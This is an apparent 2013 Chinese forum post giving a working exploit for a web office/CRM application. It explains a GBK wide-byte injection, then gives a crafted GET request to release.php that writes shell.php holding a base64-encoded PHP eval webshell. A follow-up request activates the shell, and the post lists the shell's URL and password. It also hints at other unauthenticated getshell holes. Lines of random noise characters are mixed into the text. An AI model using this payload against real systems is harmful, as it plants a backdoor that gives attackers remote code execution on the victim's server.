此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
+ ~1 p6 Y3 q) C) y+ Z8 Y' X0 |# Y7 _- D5 U; P- @. c
( o2 W b) D& EEXP:2 Q, m& U6 B; t/ [
' C$ I, ?3 a+ [4 y& n第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
9 M5 ]" }5 o: S( t, \+ t9 w 6 n4 s0 l6 E) m+ V; q
第二步: [GET]http://site/general/email/index.php
8 E/ ^' Y& J5 p! ?/ u3 y2 n; r / v$ G3 `2 m% t7 B% c9 T" Z* f1 o' W
SHELL: http://site/general/email/shell.php 密码C
. k1 ~2 y* m1 A
$ ~( Y" e' l9 e, l# m% Z ! f% T5 Y2 ]! O8 t# R* U
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
, }2 a1 o `8 Z7 [* w4 N( q
/ Q/ U8 p9 ~- m% U) w) ]4 _ `有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
+ V+ J; i" k) w* b' H6 Z3 x
& I) l7 P8 x2 r* F
" \1 ?$ m6 ~: w6 _7 ^: H |
发表于 2013-2-4 16:19:29
收藏
支持
反对